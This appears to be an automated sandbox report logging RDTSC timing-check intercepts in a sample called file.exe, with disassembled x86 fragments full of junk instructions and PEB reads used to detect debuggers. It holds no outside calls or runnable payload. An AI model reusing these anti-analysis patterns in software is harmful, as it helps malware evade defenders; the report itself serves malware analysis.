Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14830AF second address: 14830BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760007E second address: 7600090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000030h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600090 second address: 7600094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600094 second address: 76000A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76000A4 second address: 76000B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76000B6 second address: 76001A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b jmp 00007F1F81013DB7h 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 call 00007F1F81013DB4h 0x00000017 pushfd 0x00000018 jmp 00007F1F81013DB2h 0x0000001d or si, 5658h 0x00000022 jmp 00007F1F81013DABh 0x00000027 popfd 0x00000028 pop ecx 0x00000029 mov esi, ebx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007F1F81013DB0h 0x00000033 pushfd 0x00000034 jmp 00007F1F81013DB2h 0x00000039 xor eax, 086CE7E8h 0x0000003f jmp 00007F1F81013DABh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007F1F81013DB6h 0x0000004c mov ebx, dword ptr [eax+10h] 0x0000004f pushad 0x00000050 mov edx, esi 0x00000052 pushad 0x00000053 call 00007F1F81013DB8h 0x00000058 pop esi 0x00000059 popad 0x0000005a popad 0x0000005b xchg eax, esi 0x0000005c pushad 0x0000005d push ecx 0x0000005e call 00007F1F81013DB9h 0x00000063 pop ecx 0x00000064 pop edx 0x00000065 push eax 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76001A8 second address: 76001CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov bx, BAAAh 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 push eax 0x00000016 push edx 0x00000017 call 00007F1F80D7764Bh 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76001CB second address: 7600212 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F81013DB9h 0x00000008 jmp 00007F1F81013DABh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov esi, dword ptr [759B06ECh] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a call 00007F1F81013DB2h 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600212 second address: 7600239 instructions: 0x00000000 rdtsc 0x00000002 call 00007F1F80D7764Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 126Ch 0x0000000e popad 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1F80D7764Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600239 second address: 7600299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1F81014C1Bh 0x0000000f jmp 00007F1F81013DB6h 0x00000014 xchg eax, edi 0x00000015 jmp 00007F1F81013DB0h 0x0000001a push eax 0x0000001b jmp 00007F1F81013DABh 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1F81013DB5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600299 second address: 760029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760029F second address: 76002C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [75980B60h] 0x0000000e mov eax, 75F3E5E0h 0x00000013 ret 0x00000014 jmp 00007F1F81013DAFh 0x00000019 push 00000044h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cx, bx 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76002C7 second address: 76002EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, C425h 0x00000007 mov ah, 7Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1F80D77658h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76002EE second address: 760031D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F1F81013DB6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, ecx 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760031D second address: 760034F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007F1F80D7764Eh 0x0000000f push dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760034F second address: 7600370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr fs:[00000030h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F81013DAFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600370 second address: 7600388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77654h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600481 second address: 76004DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi], edi 0x0000000b pushad 0x0000000c mov edi, ecx 0x0000000e mov bh, cl 0x00000010 popad 0x00000011 mov dword ptr [esi+04h], eax 0x00000014 pushad 0x00000015 mov bx, A394h 0x00000019 mov bx, 6500h 0x0000001d popad 0x0000001e mov dword ptr [esi+08h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F1F81013DB0h 0x0000002a sub si, 7348h 0x0000002f jmp 00007F1F81013DABh 0x00000034 popfd 0x00000035 mov eax, 732AEABFh 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76004DD second address: 7600508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77655h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F80D7764Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600508 second address: 76005B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushfd 0x00000007 jmp 00007F1F81013DB3h 0x0000000c xor si, 539Eh 0x00000011 jmp 00007F1F81013DB9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+4Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1F81013DACh 0x00000024 and eax, 25EB9D98h 0x0000002a jmp 00007F1F81013DABh 0x0000002f popfd 0x00000030 mov ah, 57h 0x00000032 popad 0x00000033 mov dword ptr [esi+10h], eax 0x00000036 pushad 0x00000037 mov di, BD74h 0x0000003b mov bx, 3CE0h 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+50h] 0x00000043 pushad 0x00000044 mov ax, bx 0x00000047 call 00007F1F81013DB1h 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f popad 0x00000050 mov dword ptr [esi+14h], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F1F81013DB8h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76005B0 second address: 76005F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007F1F80D7764Ah 0x0000000c adc si, 2CB8h 0x00000011 jmp 00007F1F80D7764Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d jmp 00007F1F80D77656h 0x00000022 mov dword ptr [esi+18h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76005F7 second address: 76005FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76005FB second address: 7600601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600601 second address: 7600610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600610 second address: 7600624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bh, cl 0x00000010 mov ax, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600624 second address: 760062A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760062A second address: 760062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760062E second address: 760065F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+1Ch], eax 0x0000000b jmp 00007F1F81013DAAh 0x00000010 mov eax, dword ptr [ebx+5Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1F81013DB7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760065F second address: 7600703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007F1F80D77650h 0x0000000c adc ax, 9D68h 0x00000011 jmp 00007F1F80D7764Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+20h], eax 0x0000001d jmp 00007F1F80D77656h 0x00000022 mov eax, dword ptr [ebx+60h] 0x00000025 jmp 00007F1F80D77650h 0x0000002a mov dword ptr [esi+24h], eax 0x0000002d jmp 00007F1F80D77650h 0x00000032 mov eax, dword ptr [ebx+64h] 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov eax, edi 0x0000003a pushfd 0x0000003b jmp 00007F1F80D77659h 0x00000040 and ax, 6246h 0x00000045 jmp 00007F1F80D77651h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600703 second address: 7600752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F81013DB7h 0x00000008 pop eax 0x00000009 mov bh, 97h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esi+28h], eax 0x00000011 jmp 00007F1F81013DB0h 0x00000016 mov eax, dword ptr [ebx+68h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1F81013DB7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600752 second address: 760077B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, bx 0x00000012 mov ecx, ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760077B second address: 76007AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d jmp 00007F1F81013DB0h 0x00000012 mov word ptr [esi+30h], ax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007AD second address: 76007B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007B1 second address: 76007B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007B7 second address: 76007D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, C7h 0x00000005 mov ebx, 23360362h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+00000088h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, 8F61h 0x0000001b push eax 0x0000001c pop ebx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007D5 second address: 76007DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007DB second address: 76007DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007DF second address: 76007E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76007E3 second address: 7600850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c jmp 00007F1F80D77651h 0x00000011 mov eax, dword ptr [ebx+0000008Ch] 0x00000017 pushad 0x00000018 mov cx, 34C3h 0x0000001c pushfd 0x0000001d jmp 00007F1F80D77658h 0x00000022 add ax, F788h 0x00000027 jmp 00007F1F80D7764Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov dword ptr [esi+34h], eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F1F80D77655h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600850 second address: 76008D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c pushad 0x0000000d mov al, ECh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1F81013DAFh 0x00000016 xor al, FFFFFFDEh 0x00000019 jmp 00007F1F81013DB9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F1F81013DB0h 0x00000025 or cx, 11D8h 0x0000002a jmp 00007F1F81013DABh 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 mov dword ptr [esi+38h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F1F81013DB0h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76008D4 second address: 76008E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600A55 second address: 7600A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600A71 second address: 7600A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600A75 second address: 7600AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b movzx esi, bx 0x0000000e call 00007F1F81013DB5h 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AA4 second address: 7600AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AA8 second address: 7600AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AAC second address: 7600AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AB2 second address: 7600AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600AF3 second address: 7600B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1F80D77653h 0x0000000a jmp 00007F1F80D77653h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600B20 second address: 7600B44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600B44 second address: 7600B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 317Ch 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600B4D second address: 7600C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F81013DB0h 0x00000009 xor eax, 2E0A7C98h 0x0000000f jmp 00007F1F81013DABh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 js 00007F1FEF3428F3h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1F81013DABh 0x00000025 jmp 00007F1F81013DB3h 0x0000002a popfd 0x0000002b call 00007F1F81013DB8h 0x00000030 push esi 0x00000031 pop edx 0x00000032 pop ecx 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp-0Ch] 0x00000037 jmp 00007F1F81013DADh 0x0000003c mov dword ptr [esi+04h], eax 0x0000003f pushad 0x00000040 call 00007F1F81013DACh 0x00000045 pop edx 0x00000046 movzx esi, bx 0x00000049 popad 0x0000004a lea eax, dword ptr [ebx+78h] 0x0000004d jmp 00007F1F81013DB9h 0x00000052 push 00000001h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600C01 second address: 7600C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600C05 second address: 7600CA7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F81013DB8h 0x00000008 sbb si, B078h 0x0000000d jmp 00007F1F81013DABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F1F81013DAFh 0x0000001c or si, 603Eh 0x00000021 jmp 00007F1F81013DB9h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 push ebx 0x0000002a jmp 00007F1F81013DACh 0x0000002f mov dword ptr [esp], eax 0x00000032 jmp 00007F1F81013DB0h 0x00000037 lea eax, dword ptr [ebp-08h] 0x0000003a jmp 00007F1F81013DB0h 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F1F81013DAAh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600CA7 second address: 7600CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600CB6 second address: 7600D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F81013DAFh 0x00000009 jmp 00007F1F81013DB3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F1F81013DB8h 0x00000015 sbb eax, 39634388h 0x0000001b jmp 00007F1F81013DABh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F1F81013DAFh 0x0000002c add ecx, 6F58F7CEh 0x00000032 jmp 00007F1F81013DB9h 0x00000037 popfd 0x00000038 movzx esi, dx 0x0000003b popad 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600D48 second address: 7600D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600D4C second address: 7600D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600D60 second address: 7600D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DAD second address: 7600DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DC3 second address: 7600DDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b mov bx, E380h 0x0000000f mov dh, B7h 0x00000011 popad 0x00000012 test edi, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DDC second address: 7600DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DE3 second address: 7600DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77655h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600DFC second address: 7600E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E00 second address: 7600E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F1FEF0A5EF7h 0x0000000e jmp 00007F1F80D7764Dh 0x00000013 mov eax, dword ptr [ebp-04h] 0x00000016 jmp 00007F1F80D7764Eh 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e jmp 00007F1F80D77650h 0x00000023 lea eax, dword ptr [ebx+70h] 0x00000026 jmp 00007F1F80D77650h 0x0000002b push 00000001h 0x0000002d pushad 0x0000002e mov bl, FFh 0x00000030 popad 0x00000031 nop 0x00000032 jmp 00007F1F80D77654h 0x00000037 push eax 0x00000038 jmp 00007F1F80D7764Bh 0x0000003d nop 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E80 second address: 7600E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E86 second address: 7600E9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
